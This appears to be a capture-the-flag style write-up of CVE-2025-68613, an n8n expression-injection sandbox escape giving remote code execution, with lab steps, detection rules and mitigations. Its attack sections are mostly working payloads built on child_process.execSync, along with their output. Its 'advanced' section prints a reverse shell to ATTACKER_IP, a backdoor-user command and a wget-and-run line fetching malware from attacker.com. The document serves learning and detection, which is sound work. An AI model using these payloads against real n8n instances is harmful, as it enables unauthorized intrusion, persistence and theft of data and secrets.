Share
## https://sploitus.com/exploit?id=470338FB-18DD-541A-863D-D73CBD4D9420
# CVE-2025-68613 โ n8n Critical RCE Exploitation
## Overview
This repository documents a hands-on exploitation of **CVE-2025-68613 (CVSS 9.9)**, a critical Remote Code Execution vulnerability affecting the **n8n workflow automation platform** (versions 0.211.0 through 1.120.3).
This exploitation was performed **ethically** in a controlled **TryHackMe lab environment** for educational purposes only.
---
## Vulnerability Summary
| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2025-68613 |
| **CVSS Score** | 9.9 (Critical) |
| **Published** | December 19, 2025 |
| **Affected Product** | n8n Workflow Automation Platform |
| **Vulnerability Type** | Expression Injection โ Sandbox Escape โ RCE |
| **Attack Vector** | Authenticated User (Default) |
| **Patched Versions** | 1.120.4, 1.121.1, 1.122.0+ |
| **Affected Versions** | 0.211.0 - 1.120.3 |
---
## What is n8n?
n8n is an open-source workflow automation platform that allows users to visually connect applications and services for task automation. It features:
- **Node-based workflow architecture**: Each node represents an action (API request, data processing, email, etc.)
- **400+ native integrations**: Pre-built connectors to various APIs and services
- **Code nodes**: Custom JavaScript or Python code execution
- **Expression evaluation**: Dynamic expressions wrapped in `{{ }}` evaluated as JavaScript
### Deployment Models
- Self-hosted instances (on-premises or private cloud)
- Cloud-hosted (n8n.cloud) managed service
- Internal automation tools within corporate networks
---
## Technical Background
### The Vulnerability Chain
The vulnerability resides in n8n's **workflow expression evaluation system**. When authenticated users configure workflows, their input is processed as JavaScript code without adequate sandboxing.
#### Context Escalation Chain
```
Expression Sandbox
โ (escape via 'this')
Node.js Global Context
โ (access mainModule)
Module System (require)
โ (load child_process)
System Command Execution
```
### Key Flaws
1. **Insecure Expression Evaluation**: User expressions wrapped in `{{ }}` are evaluated as raw JavaScript without proper context isolation
2. **Sandbox Escape**: Access to `this` object allows escape from intended sandbox restrictions
3. **Unrestricted Module Access**: `process.mainModule.require()` provides access to Node.js module system
4. **Dangerous Module Loading**: Can load `child_process` module for system command execution
5. **No Meaningful Authentication Protection**: Any authenticated user can exploit the vulnerability
### Exploit Payload Breakdown
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('COMMAND').toString()
})()
```
**Explanation:**
- `this` โ Node.js global object
- `this.process` โ Node.js process object
- `process.mainModule` โ Root module of n8n application
- `.require('child_process')` โ Load system command execution module
- `.execSync('COMMAND')` โ Execute shell command synchronously
- `.toString()` โ Convert Buffer output to readable string
---
## Exploitation Walkthrough
### Step 1: Authentication
Access the vulnerable n8n instance and log in with valid credentials.
**Lab Credentials:**
- Email: `tryhackme@thm.local`
- Password: `Try12345!`

---
### Step 2: Welcome & Workflow Creation
After login, you're presented with the workflow creation interface. Click "Start from scratch" to begin a new workflow.

---
### Step 3: Add Manual Trigger
Click "Add first step" and search for "Manual Trigger". This node serves as the entry point for workflow execution.

**Purpose:** The Manual Trigger node allows manual execution of the workflow via the "Execute workflow" button in the UI, making it ideal for testing.
---
### Step 4: Configure Workflow & Add Field Mapping
Add an "Edit Fields" node to perform field mapping. This is where the vulnerability is exploited.

**Configuration Steps:**
1. Click "Add field" to add a new field mapping
2. Set the mode to "Expression"
3. This allows JavaScript code evaluation
---
### Step 5: Execute ID Command
Inject the payload to execute the `id` command and retrieve user/privilege information.
**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })()
```
**Result:**
```
uid=1000(node) gid=1000(node) groups=1000(node)
```

**Information Gathered:**
- Running as non-root user (uid=1000)
- Group membership (gid=1000)
- Potential privilege escalation paths
---
### Step 6: Enumerate File System with LS
Modify the payload to execute `ls` command and list directory contents.
**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('ls -la').toString() })()
```

**Output Shows:**
- Flag file present: `flag.txt`
- Directory structure and file permissions
- Additional reconnaissance data
---
### Step 7: Extract Sensitive Data
Read the flag file using `cat` command to complete the exploitation.
**Payload:**
```javascript
(function(){ return this.process.mainModule.require('child_process').execSync('cat flag.txt').toString() })()
```
**Flag Retrieved:**
```
THM{n8n_exposed_workflow}
```

---
## Advanced Exploitation Techniques
### 1. Reverse Shell
Establish interactive shell access for persistent control:
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1').toString()
})()
```
### 2. Create Backdoor User
Add a new system user for persistent access:
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('useradd -m -p $(openssl passwd -1 PASSWORD) backdoor').toString()
})()
```
### 3. Download Malicious Payload
Fetch and execute remote code:
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh').toString()
})()
```
### 4. Privilege Escalation Enumeration
Check for sudo privileges:
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('sudo -l').toString()
})()
```
### 5. Environment Reconnaissance
Extract environment variables:
```javascript
(function(){
return this.process.mainModule.require('child_process').execSync('env').toString()
})()
```
---
## Detection Strategies
### Web Proxy Logging (Nginx)
Configure your proxy to log request bodies for analysis:
```nginx
http {
log_format detailed '$remote_addr - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent" '
'Request-Body: "$request_body" '
'Duration: $request_time s';
access_log /var/log/nginx/detailed_access.log detailed;
}
```
### Sigma Detection Rule
Detect exploitation attempts via workflow API requests:
```yaml
title: CVE-2025-68613 - n8n Expression Injection RCE
logsource:
category: web_application_firewall
detection:
keywords:
- "process.mainModule.require"
- "child_process"
- "execSync"
condition: keywords
filter:
field: uri_path
value: "/rest/workflows"
method: POST
```
### Process Creation Monitoring
Monitor for suspicious child processes spawned by n8n:
- Watch for unexpected child_process spawning
- Monitor for reverse shell connections (bash, nc)
- Track suspicious file downloads/execution
- Alert on privilege escalation attempts
### Log Locations
- **n8n Logs**: `/root/.n8n/logs/`
- **System Logs**: `/var/log/auth.log`, `/var/log/syslog`
- **Workflow Execution Logs**: n8n database
### Indicators of Compromise
- Suspicious JavaScript expressions in workflow fields containing:
- `process.mainModule`
- `require('child_process')`
- `execSync` or `spawn`
- Unusual child_process executions
- Unexpected workflow modifications
- Failed login attempts followed by successful access
- File system changes in unexpected directories
---
## Exploitation Timeline
| Step | Action | Time |
|------|--------|------|
| 1 | Access n8n instance | Seconds |
| 2 | Create/modify workflow | < 1 minute |
| 3 | Add field mapping node | < 1 minute |
| 4 | Inject and execute `id` command | < 30 seconds |
| 5 | Enumerate file system with `ls` | < 1 minute |
| 6 | Extract data with `cat` | < 30 seconds |
| **Total** | **Full RCE exploitation** | **< 5 minutes** |
---
## Mitigation & Prevention
### Immediate Actions
1. **Update n8n** to patched versions:
- v1.120.4
- v1.121.1
- v1.122.0 or later
2. **Restrict Network Access**
- Implement firewall rules to limit n8n access
- Use VPN or bastion hosts for administrative access
- Disable external exposure if not required
3. **Strong Authentication**
- Enforce strong passwords
- Implement multi-factor authentication (MFA)
- Use SSO integration where possible
4. **Monitoring & Logging**
- Enable detailed logging for all n8n activities
- Monitor workflow modifications in real-time
- Set up alerts for suspicious expressions
### Long-term Security Measures
1. **Input Validation & Sanitization**
- Never evaluate user input as code
- Implement expression whitelisting
- Sanitize all workflow definitions
2. **Sandbox Implementation**
- Isolate expression evaluation in restricted sandbox
- Limit access to Node.js APIs
- Use Virtual Machines or containers for isolation
3. **Principle of Least Privilege**
- Run n8n with minimal required permissions
- Restrict file system access
- Limit network connectivity
4. **Code Review & Security Testing**
- Regular security audits of custom nodes
- Implement SAST/DAST tools
- Conduct threat modeling exercises
---
## References
- [n8n Official Documentation](https://docs.n8n.io/)
- [n8n Security Policy](https://docs.n8n.io/reference/security/)
- [Node.js Child Process Module](https://nodejs.org/api/child_process.html)
- [OWASP Code Injection](https://owasp.org/www-community/attacks/Code_Injection)
- [CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code](https://cwe.mitre.org/data/definitions/95.html)
- [CVSS v3.1 Calculator](https://www.first.org/cvss/calculator/3.1)
---
## Lab Information
- **Platform**: TryHackMe
- **Room**: n8n: CVE-2025-68613
- **Room URL**: https://tryhackme.com/room/n8ncve202568613
- **Difficulty**: Medium to Hard
- **Learning Objectives**: Expression injection, sandbox escapes, RCE, detection strategies
---
## Disclaimer
This documentation is provided for **educational and authorized security testing purposes only**. The exploitation techniques described are intended for:
- Authorized penetration testing
- Security research in controlled environments
- TryHackMe lab practice
- Understanding security vulnerabilities
Unauthorized access to computer systems is **illegal**. Always obtain proper written authorization before conducting security testing.
---
## Repository Structure
```
.
โโโ README.md # This file
โโโ exploitation-details.md # Technical deep-dive guide
โโโ screenshots/
โ โโโ 01-login.png
โ โโโ 02-Welcome.png
โ โโโ 03-Manual_Trigger.png
โ โโโ 04-Workflow-setup.png
โ โโโ 05-rce_id.png
โ โโโ 06-Change_id_ls.png
โ โโโ rce_cat_flag.png
โโโ notes/
โโโ exploitation-details.md
```
---
## Author Notes
This writeup documents the successful exploitation of CVE-2025-68613 on a TryHackMe lab environment. The vulnerability demonstrates the critical importance of secure code evaluation and the dangers of inadequate sandbox implementation in automation platforms.
Understanding this vulnerability helps both offensive security teams identify similar issues and defensive teams develop more effective detection strategies.